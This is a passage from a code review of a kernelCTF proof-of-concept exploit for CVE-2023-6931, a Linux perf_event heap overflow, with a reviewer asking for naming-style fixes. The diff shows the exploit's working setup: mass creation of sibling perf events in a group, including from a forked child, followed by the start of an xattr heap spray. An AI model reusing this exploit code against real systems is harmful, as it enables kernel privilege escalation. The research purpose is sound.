pocs/linux/kernelctf/CVE-2023-6931_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c

```diff
@@ -0,0 +1,656 @@
+    pe.size = sizeof(pe);
+    pe.config = PERF_COUNT_SW_PAGE_FAULTS;
+    pe.disabled = 1;
+    pe.exclude_kernel = 1;
+    pe.exclude_hv = 1;
+    pe.read_format = PERF_FORMAT_TOTAL_TIME_ENABLED | PERF_FORMAT_ID | PERF_FORMAT_GROUP;
+
+    group_leader = perf_event_open(&pe, 0, -1, -1, 0);
+    if (group_leader == -1) {
+        fprintf(stderr, "Error opening leader %llx\n", pe.config);
+        exit(EXIT_FAILURE);
+    }
+    puts("[+] Incrementing event ID");
+    for(int _ = 0; _ < 10; _++){
+        for(int i = 0; i < 4096; i++){
+            struct perf_event_attr  pe1;
+            memset(&pe1, 0, sizeof(pe));
+            pe1.type = PERF_TYPE_SOFTWARE;
+            pe1.size = sizeof(pe1);
+            pe1.config = PERF_COUNT_SW_PAGE_FAULTS;
+            pe1.disabled = 1;
+            pe1.exclude_kernel = 1;
+            pe1.exclude_hv = 1;
+            event = perf_event_open(&pe1, 0, -1, group_leader, 0);
+            if (event == -1) {
+                perror("asdf");
+                continue;
+            }
+            else{
+                events[i] = event;
+                close(event);
+            }
+        }
+    }
+    puts("[+] Add Siblings");
+    pid_t parent_pid;
+    parent_pid = getpid();
+    pid_t child_pid = fork();
+    if(fork < 0) puts("fail");
+    else if(child_pid == 0){
+        for(int i = 0; i < 2000; i++){
+            if(!(i % 1000))
+                puts("[+] Create Event 1000");
+            struct perf_event_attr  pe1;
+            memset(&pe1, 0, sizeof(pe));
+            pe1.type = PERF_TYPE_SOFTWARE;
+            pe1.size = sizeof(pe1);
+            pe1.config = PERF_COUNT_SW_PAGE_FAULTS;
+            pe1.disabled = 1;
+            pe1.exclude_kernel = 1;
+            pe1.exclude_hv = 1;
+            event = perf_event_open(&pe1, parent_pid, -1, group_leader, 0);
+            if (event == -1) {
+                perror("asdf");
+                continue;
+            }
+            else{
+                events[i] = event;
+                ioctl(event, PERF_EVENT_IOC_ENABLE, 0);
+            }
+        }
+        kill(parent_pid, SIGUSR1);
+        sleep(999999);
+    }
+    pause();
+    for(int i = 0; i < (0x10000/0x10+0x2000/0x10)-2000; i++){
+        if(!(i % 1000))
+            puts("[+] Create Event 1000");
+        struct perf_event_attr  pe1;
+        memset(&pe1, 0, sizeof(pe));
+        pe1.type = PERF_TYPE_SOFTWARE;
+        pe1.size = sizeof(pe1);
+        pe1.config = PERF_COUNT_SW_PAGE_FAULTS;
+        pe1.disabled = 1;
+        pe1.exclude_kernel = 1;
+        pe1.exclude_hv = 1;
+        event = perf_event_open(&pe1, 0, -1, group_leader, 0);
+        if (event == -1) {
+            perror("asdf");
+            continue;
+        }
+        else{
+            events[i+2000] = event;
+            ioctl(event, PERF_EVENT_IOC_ENABLE, 0);
+        }
+    }
+    puts("[+] Spraying xattr");
+    spray();
+    char *fname = "/tmp/zzlol";
+    char *z = "zzlol1994";
```

Comment:
Please fix this code following the [style guide](https://google.github.io/security-research/kernelctf/style_guide#naming-conventions).